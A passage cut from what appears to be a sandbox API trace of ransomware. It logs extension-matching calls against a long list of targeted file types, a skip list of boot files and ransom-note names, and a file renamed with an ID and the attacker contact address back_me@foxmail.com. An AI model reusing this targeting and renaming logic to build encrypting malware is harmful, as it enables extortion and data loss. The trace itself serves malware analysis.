(lpString=".asc") returned 4 [0241.403] lstrcmpiW (lpString1=".asc", lpString2=".ini") returned -1 [0241.403] lstrlenW (lpString=".ascx") returned 5 [0241.403] lstrcmpiW (lpString1=".ascx", lpString2="p.ini") returned -1 [0241.403] lstrlenW (lpString=".asm") returned 4 [0241.403] lstrcmpiW (lpString1=".asm", lpString2=".ini") returned -1 [0241.403] lstrlenW (lpString=".asmx") returned 5 [0241.404] lstrcmpiW (lpString1=".asmx", lpString2="p.ini") returned -1 [0241.404] lstrlenW (lpString=".asp") returned 4 [0241.404] lstrcmpiW (lpString1=".asp", lpString2=".ini") returned -1 [0241.404] lstrlenW (lpString=".aspx") returned 5 [0241.404] lstrcmpiW (lpString1=".aspx", lpString2="p.ini") returned -1 [0241.404] lstrlenW (lpString=".asr") returned 4 [0241.404] lstrcmpiW (lpString1=".asr", lpString2=".ini") returned -1 [0241.404] lstrlenW (lpString=".asx") returned 4 [0241.404] lstrcmpiW (lpString1=".asx", lpString2=".ini") returned -1 [0241.404] lstrlenW (lpString=".avi") returned 4 [0241.404] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0241.404] lstrlenW (lpString=".avs") returned 4 [0241.404] lstrcmpiW (lpString1=".avs", lpString2=".ini") returned -1 [0241.404] lstrlenW (lpString=".backup") returned 7 [0241.404] lstrcmpiW (lpString1=".backup", lpString2="top.ini") returned -1 [0241.404] lstrlenW (lpString=".bak") returned 4 [0241.404] lstrcmpiW (lpString1=".bak", lpString2=".ini") returned -1 [0241.404] lstrlenW (lpString=".bay") returned 4 [0241.404] lstrcmpiW (lpString1=".bay", lpString2=".ini") returned -1 [0241.404] lstrlenW (lpString=".bd") returned 3 [0241.404] lstrcmpiW (lpString1=".bd", lpString2="ini") returned -1 [0241.404] lstrlenW (lpString=".bin") returned 4 [0241.404] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0241.404] lstrlenW (lpString=".bmp") returned 4 [0241.404] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0241.404] lstrlenW (lpString=".bz2") returned 4 [0241.404] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0241.404] lstrlenW (lpString=".c") returned 2 [0241.404] lstrcmpiW (lpString1=".c", lpString2="ni") returned -1 [0241.404] lstrlenW (lpString=".cdr") returned 4 [0241.404] lstrcmpiW (lpString1=".cdr", lpString2=".ini") returned -1 [0241.404] lstrlenW (lpString=".cer") returned 4 [0241.405] lstrcmpiW (lpString1=".cer", lpString2=".ini") returned -1 [0241.405] lstrlenW (lpString=".cf") returned 3 [0241.405] lstrcmpiW (lpString1=".cf", lpString2="ini") returned -1 [0241.405] lstrlenW (lpString=".cfc") returned 4 [0241.405] lstrcmpiW (lpString1=".cfc", lpString2=".ini") returned -1 [0241.405] lstrlenW (lpString=".cfm") returned 4 [0241.405] lstrcmpiW (lpString1=".cfm", lpString2=".ini") returned -1 [0241.405] lstrlenW (lpString=".cfml") returned 5 [0241.405] lstrcmpiW (lpString1=".cfml", lpString2="p.ini") returned -1 [0241.405] lstrlenW (lpString=".cfu") returned 4 [0241.405] lstrcmpiW (lpString1=".cfu", lpString2=".ini") returned -1 [0241.405] lstrlenW (lpString=".chm") returned 4 [0241.405] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1 [0241.405] lstrlenW (lpString=".cin") returned 4 [0241.405] lstrcmpiW (lpString1=".cin", lpString2=".ini") returned -1 [0241.405] lstrlenW (lpString=".class") returned 6 [0241.405] lstrcmpiW (lpString1=".class", lpString2="op.ini") returned -1 [0241.405] lstrlenW (lpString=".clx") returned 4 [0241.405] lstrcmpiW (lpString1=".clx", lpString2=".ini") returned -1 [0241.405] lstrlenW (lpString=".config") returned 7 [0241.405] lstrcmpiW (lpString1=".config", lpString2="top.ini") returned -1 [0241.405] lstrlenW (lpString=".cpp") returned 4 [0241.405] lstrcmpiW (lpString1=".cpp", lpString2=".ini") returned -1 [0241.405] lstrlenW (lpString=".cr2") returned 4 [0241.405] lstrcmpiW (lpString1=".cr2", lpString2=".ini") returned -1 [0241.405] lstrlenW (lpString=".crt") returned 4 [0241.405] lstrcmpiW (lpString1=".crt", lpString2=".ini") returned -1 [0241.405] lstrlenW (lpString=".crw") returned 4 [0241.405] lstrcmpiW (lpString1=".crw", lpString2=".ini") returned -1 [0241.405] lstrlenW (lpString=".cs") returned 3 [0241.405] lstrcmpiW (lpString1=".cs", lpString2="ini") returned -1 [0241.405] lstrlenW (lpString=".css") returned 4 [0241.405] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0241.406] lstrlenW (lpString=".csv") returned 4 [0241.406] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0241.406] lstrlenW (lpString=".cub") returned 4 [0241.406] lstrcmpiW (lpString1=".cub", lpString2=".ini") returned -1 [0241.406] lstrlenW (lpString=".dae") returned 4 [0241.406] lstrcmpiW (lpString1=".dae", lpString2=".ini") returned -1 [0241.406] lstrlenW (lpString=".dat") returned 4 [0241.406] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0241.406] lstrlenW (lpString=".db") returned 3 [0241.406] lstrcmpiW (lpString1=".db", lpString2="ini") returned -1 [0241.406] lstrlenW (lpString=".dbf") returned 4 [0241.406] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0241.406] lstrlenW (lpString=".dbx") returned 4 [0241.406] lstrcmpiW (lpString1=".dbx", lpString2=".ini") returned -1 [0241.406] lstrlenW (lpString=".dc3") returned 4 [0241.406] lstrcmpiW (lpString1=".dc3", lpString2=".ini") returned -1 [0241.406] lstrlenW (lpString=".dcm") returned 4 [0241.406] lstrcmpiW (lpString1=".dcm", lpString2=".ini") returned -1 [0241.406] lstrlenW (lpString=".dcr") returned 4 [0241.406] lstrcmpiW (lpString1=".dcr", lpString2=".ini") returned -1 [0241.406] lstrlenW (lpString=".der") returned 4 [0241.406] lstrcmpiW (lpString1=".der", lpString2=".ini") returned -1 [0241.406] lstrlenW (lpString=".dib") returned 4 [0241.406] lstrcmpiW (lpString1=".dib", lpString2=".ini") returned -1 [0241.406] lstrlenW (lpString=".dic") returned 4 [0241.406] lstrcmpiW (lpString1=".dic", lpString2=".ini") returned -1 [0241.406] lstrlenW (lpString=".dif") returned 4 [0241.406] lstrcmpiW (lpString1=".dif", lpString2=".ini") returned -1 [0241.406] lstrlenW (lpString=".divx") returned 5 [0241.406] lstrcmpiW (lpString1=".divx", lpString2="p.ini") returned -1 [0241.406] lstrlenW (lpString=".djvu") returned 5 [0241.406] lstrcmpiW (lpString1=".djvu", lpString2="p.ini") returned -1 [0241.406] lstrlenW (lpString=".dng") returned 4 [0241.407] lstrcmpiW (lpString1=".dng", lpString2=".ini") returned -1 [0241.407] lstrlenW (lpString=".doc") returned 4 [0241.407] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0241.407] lstrlenW (lpString=".docm") returned 5 [0241.407] lstrcmpiW (lpString1=".docm", lpString2="p.ini") returned -1 [0241.407] lstrlenW (lpString=".docx") returned 5 [0241.407] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0241.407] lstrlenW (lpString=".dot") returned 4 [0241.407] lstrcmpiW (lpString1=".dot", lpString2=".ini") returned -1 [0241.407] lstrlenW (lpString=".dotm") returned 5 [0241.407] lstrcmpiW (lpString1=".dotm", lpString2="p.ini") returned -1 [0241.407] lstrlenW (lpString=".dotx") returned 5 [0241.407] lstrcmpiW (lpString1=".dotx", lpString2="p.ini") returned -1 [0241.407] lstrlenW (lpString=".dpx") returned 4 [0241.407] lstrcmpiW (lpString1=".dpx", lpString2=".ini") returned -1 [0241.407] lstrlenW (lpString=".dqy") returned 4 [0241.407] lstrcmpiW (lpString1=".dqy", lpString2=".ini") returned -1 [0241.407] lstrlenW (lpString=".dsn") returned 4 [0241.407] lstrcmpiW (lpString1=".dsn", lpString2=".ini") returned -1 [0241.407] lstrlenW (lpString=".dt") returned 3 [0241.407] lstrcmpiW (lpString1=".dt", lpString2="ini") returned -1 [0241.407] lstrlenW (lpString=".dtd") returned 4 [0241.407] lstrcmpiW (lpString1=".dtd", lpString2=".ini") returned -1 [0241.407] lstrlenW (lpString=".dwg") returned 4 [0241.407] lstrcmpiW (lpString1=".dwg", lpString2=".ini") returned -1 [0241.407] lstrlenW (lpString=".dwt") returned 4 [0241.407] lstrcmpiW (lpString1=".dwt", lpString2=".ini") returned -1 [0241.407] lstrlenW (lpString=".dx") returned 3 [0241.407] lstrcmpiW (lpString1=".dx", lpString2="ini") returned -1 [0241.407] lstrlenW (lpString=".dxf") returned 4 [0241.407] lstrcmpiW (lpString1=".dxf", lpString2=".ini") returned -1 [0241.407] lstrlenW (lpString=".edml") returned 5 [0241.408] lstrcmpiW (lpString1=".edml", lpString2="p.ini") returned -1 [0241.408] lstrlenW (lpString=".efd") returned 4 [0241.408] lstrcmpiW (lpString1=".efd", lpString2=".ini") returned -1 [0241.408] lstrlenW (lpString=".elf") returned 4 [0241.408] lstrcmpiW (lpString1=".elf", lpString2=".ini") returned -1 [0241.408] lstrlenW (lpString=".emf") returned 4 [0241.408] lstrcmpiW (lpString1=".emf", lpString2=".ini") returned -1 [0241.408] lstrlenW (lpString=".emz") returned 4 [0241.408] lstrcmpiW (lpString1=".emz", lpString2=".ini") returned -1 [0241.408] lstrlenW (lpString=".epf") returned 4 [0241.408] lstrcmpiW (lpString1=".epf", lpString2=".ini") returned -1 [0241.408] lstrlenW (lpString=".eps") returned 4 [0241.408] lstrcmpiW (lpString1=".eps", lpString2=".ini") returned -1 [0241.408] lstrlenW (lpString=".epsf") returned 5 [0241.408] lstrcmpiW (lpString1=".epsf", lpString2="p.ini") returned -1 [0241.408] lstrlenW (lpString=".epsp") returned 5 [0241.408] lstrcmpiW (lpString1=".epsp", lpString2="p.ini") returned -1 [0241.408] lstrlenW (lpString=".erf") returned 4 [0241.408] lstrcmpiW (lpString1=".erf", lpString2=".ini") returned -1 [0241.408] lstrlenW (lpString=".exr") returned 4 [0241.408] lstrcmpiW (lpString1=".exr", lpString2=".ini") returned -1 [0241.408] lstrlenW (lpString=".f4v") returned 4 [0241.408] lstrcmpiW (lpString1=".f4v", lpString2=".ini") returned -1 [0241.408] lstrlenW (lpString=".fido") returned 5 [0241.408] lstrcmpiW (lpString1=".fido", lpString2="p.ini") returned -1 [0241.408] lstrlenW (lpString=".flm") returned 4 [0241.408] lstrcmpiW (lpString1=".flm", lpString2=".ini") returned -1 [0241.408] lstrlenW (lpString=".flv") returned 4 [0241.408] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0241.408] lstrlenW (lpString=".frm") returned 4 [0241.408] lstrcmpiW (lpString1=".frm", lpString2=".ini") returned -1 [0241.408] lstrlenW (lpString=".fxg") returned 4 [0241.408] lstrcmpiW (lpString1=".fxg", lpString2=".ini") returned -1 [0241.409] lstrlenW (lpString=".geo") returned 4 [0241.409] lstrcmpiW (lpString1=".geo", lpString2=".ini") returned -1 [0241.409] lstrlenW (lpString=".gif") returned 4 [0241.409] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0241.409] lstrlenW (lpString=".grs") returned 4 [0241.409] lstrcmpiW (lpString1=".grs", lpString2=".ini") returned -1 [0241.409] lstrlenW (lpString=".gz") returned 3 [0241.409] lstrcmpiW (lpString1=".gz", lpString2="ini") returned -1 [0241.409] lstrlenW (lpString=".h") returned 2 [0241.409] lstrcmpiW (lpString1=".h", lpString2="ni") returned -1 [0241.409] lstrlenW (lpString=".hdr") returned 4 [0241.409] lstrcmpiW (lpString1=".hdr", lpString2=".ini") returned -1 [0241.409] lstrlenW (lpString=".hpp") returned 4 [0241.409] lstrcmpiW (lpString1=".hpp", lpString2=".ini") returned -1 [0241.409] lstrlenW (lpString=".hta") returned 4 [0241.409] lstrcmpiW (lpString1=".hta", lpString2=".ini") returned -1 [0241.409] lstrlenW (lpString=".htc") returned 4 [0241.409] lstrcmpiW (lpString1=".htc", lpString2=".ini") returned -1 [0241.409] lstrlenW (lpString=".htm") returned 4 [0241.409] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0241.409] lstrlenW (lpString=".html") returned 5 [0241.409] lstrcmpiW (lpString1=".html", lpString2="p.ini") returned -1 [0241.409] lstrlenW (lpString=".icb") returned 4 [0241.409] lstrcmpiW (lpString1=".icb", lpString2=".ini") returned -1 [0241.409] lstrlenW (lpString=".ics") returned 4 [0241.409] lstrcmpiW (lpString1=".ics", lpString2=".ini") returned -1 [0241.409] lstrlenW (lpString=".iff") returned 4 [0241.409] lstrcmpiW (lpString1=".iff", lpString2=".ini") returned -1 [0241.409] lstrlenW (lpString=".inc") returned 4 [0241.409] lstrcmpiW (lpString1=".inc", lpString2=".ini") returned -1 [0241.409] lstrlenW (lpString=".indd") returned 5 [0241.409] lstrcmpiW (lpString1=".indd", lpString2="p.ini") returned -1 [0241.410] lstrlenW (lpString=".ini") returned 4 [0241.410] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0241.410] lstrlenW (lpString="desktop.ini") returned 11 [0241.410] lstrlenW (lpString=".php") returned 4 [0241.410] lstrcmpiW (lpString1=".php", lpString2=".ini") returned 1 [0241.410] lstrlenW (lpString="desktop.ini") returned 11 [0241.410] lstrcmpiW (lpString1="boot.ini", lpString2="desktop.ini") returned -1 [0241.410] lstrcmpiW (lpString1="bootfont.bin", lpString2="desktop.ini") returned -1 [0241.410] lstrcmpiW (lpString1="ntldr", lpString2="desktop.ini") returned 1 [0241.410] lstrcmpiW (lpString1="ntdetect.com", lpString2="desktop.ini") returned 1 [0241.410] lstrcmpiW (lpString1="io.sys", lpString2="desktop.ini") returned 1 [0241.410] lstrcmpiW (lpString1="RETURN FILES.txt", lpString2="desktop.ini") returned 1 [0241.410] lstrcmpiW (lpString1="Info.hta", lpString2="desktop.ini") returned 1 [0241.410] lstrcmpiW (lpString1="MicosoftSearch.exe", lpString2="desktop.ini") returned 1 [0241.410] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0241.410] FindNextFileW (in: hFindFile=0x4701068, lpFindFileData=0x3baf808 | out: lpFindFileData=0x3baf808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3ebb1770, ftCreationTime.dwHighDateTime=0x1d5351d, ftLastAccessTime.dwLowDateTime=0x3ebb1770, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x3ebd78d0, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id-9C354B42.[back_me@foxmail.com].php", cAlternateFileName="DESKTO~1.PHP")) returned 1 [0241.410] lstrlenW (lpString="desktop.ini.id-9C354B42.[back_me@foxmail.com].php") returned 49 [0241.410] lstrlenW (lpString=".1cd") returned 4 [0241.410] lstrcmpiW (lpString1=".1cd", lpString2=".php") returned -1 [0241.410] lstrlenW (lpString=".3ds") returned 4 [0241.410] lstrcmpiW (lpString1=".3ds", lpString2=".php") returned -1 [0241.410] lstrlenW (lpString=".3fr") returned 4 [0241.410] lstrcmpiW (lpString1=".3fr", lpString2=".php") returned -1 [0241.410] lstrlenW (lpString=".3g2") returned 4 [0241.410] lstrcmpiW (lpString1=".3g2", lpString2=".php") returned -1 [0241.410] lstrlenW (lpString=".3gp") returned 4 [0241.410] lstrcmpiW (lpString1=".3gp", lpString2=".php") returned -1 [0241.410] lstrlenW (lpString=".7z") returned 3 [0241.410] lstrcmpiW (lpString1=".7z", lpString2="php") returned -1 [0241.411] lstrlenW (lpString=".accda") returned 6 [0241.411] lstrcmpiW (lpString1=".accda", lpString2="m].php") returned -1 [0241.411] lstrlenW (lpString=".accdb") returned 6 [0241.411] lstrcmpiW (lpString1=".accdb", lpString2="m].php") returned -1 [0241.411] lstrlenW (lpString=".accdc") returned 6 [0241.411] lstrcmpiW (lpString1=".accdc", lpString2="m].php") returned -1 [0241.411] lstrlenW (lpString=".accde") returned 6 [0241.411] lstrcmpiW (lpString1=".accde", lpString2="m].php") returned -1 [0241.411] lstrlenW (lpString=".accdt") returned 6 [0241.411] lstrcmpiW (lpString1=".accdt", lpString2="m].php") returned -1 [0241.411] lstrlenW (lpString=".accdw") returned 6 [0241.411] lstrcmpiW (lpString1=".accdw", lpString2="m].php") returned -1 [0241.411] lstrlenW (lpString=".adb") returned 4 [0241.411] lstrcmpiW (lpString1=".adb", lpString2=".php") returned -1 [0241.411] lstrlenW (lpString=".adp") returned 4 [0241.411] lstrcmpiW (lpString1=".adp", lpString2=".php") returned -1 [0241.411] lstrlenW (lpString=".ai") returned 3 [0241.411] lstrcmpiW (lpString1=".ai", lpString2="php") returned -1 [0241.411] lstrlenW (lpString=".ai3") returned 4 [0241.411] lstrcmpiW (lpString1=".ai3", lpString2=".php") returned -1 [0241.411] lstrlenW (lpString=".ai4") returned 4 [0241.411] lstrcmpiW (lpString1=".ai4", lpString2=".php") returned -1 [0241.411] lstrlenW (lpString=".ai5") returned 4 [0241.411] lstrcmpiW (lpString1=".ai5", lpString2=".php") returned -1 [0241.411] lstrlenW (lpString=".ai6") returned 4 [0241.411] lstrcmpiW (lpString1=".ai6", lpString2=".php") returned -1 [0241.411] lstrlenW (lpString=".ai7") returned 4 [0241.411] lstrcmpiW (lpString1=".ai7", lpString2=".php") returned -1 [0241.411] lstrlenW (lpString=".ai8") returned 4 [0241.411] lstrcmpiW (lpString1=".ai8", lpString2=".php") returned -1 [0241.411] lstrlenW (lpString=".anim") returned 5 [0241.411] lstrcmpiW (lpString1=".anim", lpString2="].php") returned -1 [0241.411] lstrlenW (lpString=".arw") returned 4 [0241.412] lstrcmpiW (lpString1=".arw", lpString2=".php") returned -1 [0241.412] lstrlenW (lpString=".as") returned 3 [0241.412] lstrcmpiW (lpString1=".as", lpString2="php") returned -1 [0241.412] lstrlenW (lpString=".asa") returned 4 [0241.412] lstrcmpiW (lpString1=".asa", lpString2=".php") returned -1 [0241.412] lstrlenW (lpString=".asc") returned 4 [0241.412] lstrcmpiW (lpString1=".asc", lpString2=".php") returned -1 [0241.412] lstrlenW (lpString=".ascx") returned 5 [0241.412] lstrcmpiW (lpString1=".ascx", lpString2="].php") returned -1 [0241.412] lstrlenW (lpString=".asm") returned 4 [0241.412] lstrcmpiW (lpString1=".asm", lpString2=".php") returned -1 [0241.412] lstrlenW (lpString=".asmx") returned 5 [0241.412] lstrcmpiW (lpString1=".asmx", lpString2="].php") returned -1 [0241.412] lstrlenW (lpString=".asp") returned 4 [0241.412] lstrcmpiW (lpString1=".asp", lpString2=".php") returned -1 [0241.412] lstrlenW (lpString=".aspx") returned 5 [0241.412] lstrcmpiW (lpString1=".aspx", lpString2="].php") returned -1 [0241.412] lstrlenW (lpString=".asr") returned 4 [0241.412] lstrcmpiW (lpString1=".asr", lpString2=".php") returned -1 [0241.412] lstrlenW (lpString=".asx") returned 4 [0241.412] lstrcmpiW (lpString1=".asx", lpString2=".php") returned -1 [0241.412] lstrlenW (lpString=".avi") returned 4 [0241.412] lstrcmpiW (lpString1=".avi", lpString2=".php") returned -1 [0241.412] lstrlenW (lpString=".avs") returned 4 [0241.412] lstrcmpiW (lpString1=".avs", lpString2=".php") returned -1 [0241.412] lstrlenW (lpString=".backup") returned 7 [0241.412] lstrcmpiW (lpString1=".backup", lpString2="om].php") returned -1 [0241.412] lstrlenW (lpString=".bak") returned 4 [0241.412] lstrcmpiW (lpString1=".bak", lpString2=".php") returned -1 [0241.412] lstrlenW (lpString=".bay") returned 4 [0241.412] lstrcmpiW (lpString1=".bay", lpString2=".php") returned -1 [0241.412] lstrlenW (lpString=".bd") returned 3 [0241.413] lstrcmpiW (lpString1=".bd", lpString2="php") returned -1 [0241.413] lstrlenW (lpString=".bin") returned 4 [0241.413] lstrcmpiW (lpString1=".bin", lpString2=".php") returned -1 [0241.413] lstrlenW (lpString=".bmp") returned 4 [0241.413] lstrcmpiW (lpString1=".bmp", lpString2=".php") returned -1 [0241.413] lstrlenW (lpString=".bz2") returned 4 [0241.413] lstrcmpiW (lpString1=".bz2", lpString2=".php") returned -1 [0241.413] lstrlenW (lpString=".c") returned 2 [0241.413] lstrcmpiW (lpString1=".c", lpString2="hp") returned -1 [0241.413] lstrlenW (lpString=".cdr") returned 4 [0241.413] lstrcmpiW (lpString1=".cdr", lpString2=".php") returned -1 [0241.413] lstrlenW (lpString=".cer") returned 4 [0241.413] lstrcmpiW (lpString1=".cer", lpString2=".php") returned -1 [0241.413] lstrlenW (lpString=".cf") returned 3 [0241.413] lstrcmpiW (lpString1=".cf", lpString2="php") returned -1 [0241.413] lstrlenW (lpString=".cfc") returned 4 [0241.413] lstrcmpiW (lpString1=".cfc", lpString2=".php") returned -1 [0241.413] lstrlenW (lpString=".cfm") returned 4 [0241.413] lstrcmpiW (lpString1=".cfm", lpString2=".php") returned -1 [0241.413] lstrlenW (lpString=".cfml") returned 5 [0241.414] lstrcmpiW (lpString1=".cfml", lpString2="].php") returned -1 [0241.414] lstrlenW (lpString=".cfu") returned 4 [0241.414] lstrcmpiW (lpString1=".cfu", lpString2=".php") returned -1 [0241.414] lstrlenW (lpString=".chm") returned 4 [0241.414] lstrcmpiW (lpString1=".chm", lpString2=".php") returned -1 [0241.414] lstrlenW (lpString=".cin") returned 4 [0241.414] lstrcmpiW (lpString1=".cin", lpString2=".php") returned -1 [0241.414] lstrlenW (lpString=".class") returned 6 [0241.414] lstrcmpiW (lpString1=".class", lpString2="m].php") returned -1 [0241.414] lstrlenW (lpString=".clx") returned 4 [0241.414] lstrcmpiW (lpString1=".clx", lpString2=".php") returned -1 [0241.414] lstrlenW (lpString=".config") returned 7 [0241.414] lstrcmpiW (lpString1=".config", lpString2="om].php") returned -1 [0241.414] lstrlenW (lpString=".cpp") returned 4 [0241.414] lstrcmpiW (lpString1=".cpp", lpString2=".php") returned -1 [0241.414] lstrlenW (lpString=".cr2") returned 4 [0241.414] lstrcmpiW (lpString1=".cr2", lpString2=".php") returned -1 [0241.414] lstrlenW (lpString=".crt") returned 4 [0241.414] lstrcmpiW (lpString1=".crt", lpString2=".php") returned -1 [0241.414] lstrlenW (lpString=".crw") returned 4 [0241.414] lstrcmpiW (lpString1=".crw", lpString2=".php") returned -1 [0241.414] lstrlenW (lpString=".cs") returned 3 [0241.414] lstrcmpiW (lpString1=".cs", lpString2="php") returned -1 [0241.414] lstrlenW (lpString=".css") returned 4 [0241.414] lstrcmpiW (lpString1=".css", lpString2=".php") returned -1 [0241.414] lstrlenW (lpString=".csv") returned 4 [0241.414] lstrcmpiW (lpString1=".csv", lpString2=".php") returned -1 [0241.414] lstrlenW (lpString=".cub") returned 4 [0241.414] lstrcmpiW (lpString1=".cub", lpString2=".php") returned -1 [0241.414] lstrlenW (lpString=".dae") returned 4 [0241.414] lstrcmpiW (lpString1=".dae", lpString2=".php") returned -1 [0241.414] lstrlenW (lpString=".dat") returned 4 [0241.415] lstrcmpiW (lpString1=".dat", lpString2=".php") returned -1 [0241.415] lstrlenW (lpString=".db") returned 3 [0241.415] lstrcmpiW (lpString1=".db", lpString2="php") returned -1 [0241.415] lstrlenW (lpString=".dbf") returned 4 [0241.415] lstrcmpiW (lpString1=".dbf", lpString2=".php") returned -1 [0241.415] lstrlenW (lpString=".dbx") returned 4 [0241.415] lstrcmpiW (lpString1=".dbx", lpString2=".php") returned -1 [0241.415] lstrlenW (lpString=".dc3") returned 4 [0241.415] lstrcmpiW (lpString1=".dc3", lpString2=".php") returned -1 [0241.415] lstrlenW (lpString=".dcm") returned 4 [0241.415] lstrcmpiW (lpString1=".dcm", lpString2=".php") returned -1 [0241.415] lstrlenW (lpString=".dcr") returned 4 [0241.415] lstrcmpiW (lpString1=".dcr", lpString2=".php") returned -1 [0241.415] lstrlenW (lpString=".der") returned 4 [0241.415] lstrcmpiW (lpString1=".der", lpString2=".php") returned -1 [0241.415] lstrlenW (lpString=".dib") returned 4 [0241.415] lstrcmpiW (lpString1=".dib", lpString2=".php") returned -1 [0241.415] lstrlenW (lpString=".dic") returned 4 [0241.415] lstrcmpiW (lpString1=".dic", lpString2=".php") returned -1 [0241.415] lstrlenW (lpString=".dif") returned 4 [0241.415] lstrcmpiW (lpString1=".dif", lpString2=".php") returned -1 [0241.415] lstrlenW (lpString=".divx") returned 5 [0241.415] lstrcmpiW (lpString1=".divx", lpString2="].php") returned -1 [0241.415] lstrlenW (lpString=".djvu") returned 5 [0241.415] lstrcmpiW (lpString1=".djvu", lpString2="].php") returned -1 [0241.415] lstrlenW (lpString=".dng") returned 4 [0241.415] lstrcmpiW (lpString1=".dng", lpString2=".php") returned -1 [0241.415] lstrlenW (lpString=".doc") returned 4 [0241.415] lstrcmpiW (lpString1=".doc", lpString2=".php") returned -1 [0241.415] lstrlenW (lpString=".docm") returned 5 [0241.415] lstrcmpiW (lpString1=".docm", lpString2="].php") returned -1 [0241.415] lstrlenW (lpString=".docx") returned 5 [0241.415] lstrcmpiW (lpString1=".docx", lpString2="].php") returned -1 [0241.416] lstrlenW (lpString=".dot") returned 4 [0241.416] lstrcmpiW (lpString1=".dot", lpString2=".php") returned -1 [0241.416] lstrlenW (lpString=".dotm") returned 5 [0241.416] lstrcmpiW (lpString1=".dotm", lpString2="].php") returned -1 [0241.416] lstrlenW (lpString=".dotx") returned 5 [0241.416] lstrcmpiW (lpString1=".dotx", lpString2="].php") returned -1 [0241.416] lstrlenW (lpString=".dpx") returned 4 [0241.416] lstrcmpiW (lpString1=".dpx", lpString2=".php") returned -1 [0241.416] lstrlenW (lpString=".dqy") returned 4 [0241.416] lstrcmpiW (lpString1=".dqy", lpString2=".php") returned -1 [0241.416] lstrlenW (lpString=".dsn") returned 4 [0241.416] lstrcmpiW (lpString1=".dsn", lpString2=".php") returned -1 [0241.416] lstrlenW (lpString=".dt") returned 3 [0241.416] lstrcmpiW (lpString1=".dt", lpString2="php") returned -1 [0241.416] lstrlenW (lpString=".dtd") returned 4 [0241.416] lstrcmpiW (lpString1=".dtd", lpString2=".php") returned -1 [0241.416] lstrlenW (lpString=".dwg") returned 4 [0241.416] lstrcmpiW (lpString1=".dwg", lpString2=".php") returned -1 [0241.416] lstrlenW (lpString=".dwt") returned 4 [0241.416] lstrcmpiW (lpString1=".dwt", lpString2=".php") returned -1 [0241.416] lstrlenW (lpString=".dx") returned 3 [0241.416] lstrcmpiW (lpString1=".dx", lpString2="php") returned -1 [0241.416] lstrlenW (lpString=".dxf") returned 4 [0241.416] lstrcmpiW (lpString1=".dxf", lpString2=".php") returned -1 [0241.416] lstrlenW (lpString=".edml") returned 5 [0241.416] lstrcmpiW (lpString1=".edml", lpString2="].php") returned -1 [0241.416] lstrlenW (lpString=".efd") returned 4 [0241.416] lstrcmpiW (lpString1=".efd", lpString2=".php") returned -1 [0241.416] lstrlenW (lpString=".elf") returned 4 [0241.416] lstrcmpiW (lpString1=".elf", lpString2=".php") returned -1 [0241.416] lstrlenW (lpString=".emf") returned 4 [0241.416] lstrcmpiW (lpString1=".emf", lpString2=".php") returned -1 [0241.416] lstrlenW (lpString=".emz") returned 4 [0241.417] lstrcmpiW (lpString1=".emz", lpString2=".php") returned -1 [0241.417] lstrlenW (lpString=".epf") returned 4 [0241.417] lstrcmpiW (lpString1=".epf", lpString2=".php") returned -1 [0241.417] lstrlenW (lpString=".eps") returned 4 [0241.417] lstrcmpiW (lpString1=".eps", lpString2=".php") returned -1 [0241.417] lstrlenW (lpString=".epsf") returned 5 [0241.417] lstrcmpiW (lpString1=".epsf", lpString2="].php") returned -1 [0241.417] lstrlenW (lpString=".epsp") returned 5 [0241.417] lstrcmpiW (lpString1=".epsp", lpString2="].php") returned -1 [0241.417] lstrlenW (lpString=".erf") returned 4 [0241.417] lstrcmpiW (lpString1=".erf", lpString2=".php") returned -1 [0241.417] lstrlenW (lpString=".exr") returned 4 [0241.417] lstrcmpiW (lpString1=".exr", lpString2=".php") returned -1 [0241.417] lstrlenW (lpString=".f4v") returned 4 [0241.417] lstrcmpiW (lpString1=".f4v", lpString2=".php") returned -1 [0241.417] lstrlenW (lpString=".fido") returned 5 [0241.417] lstrcmpiW (lpString1=".fido", lpString2="].php") returned -1 [0241.417] lstrlenW (lpString=".flm") returned 4 [0241.417] lstrcmpiW (lpString1=".flm", lpString2=".php") returned -1 [0241.417] lstrlenW (lpString=".flv") returned 4 [0241.417] lstrcmpiW (lpString1=".flv", lpString2=".php") returned -1 [0241.417] lstrlenW (lpString=".frm") returned 4 [0241.417] lstrcmpiW (lpString1=".frm", lpString2=".php") returned -1 [0241.419] FindNextFileW (in: hFindFile=0xba76e0, lpFindFileData=0x3bafa84 | out: lpFindFileData=0x3bafa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x3ec6fe50, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x3ec6fe50, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0241.419] FindNextFileW (in: hFindFile=0xba76e0, lpFindFileData=0x3bafa84 | out: lpFindFileData=0x3bafa84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x51a20ce0, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x51a20ce0, 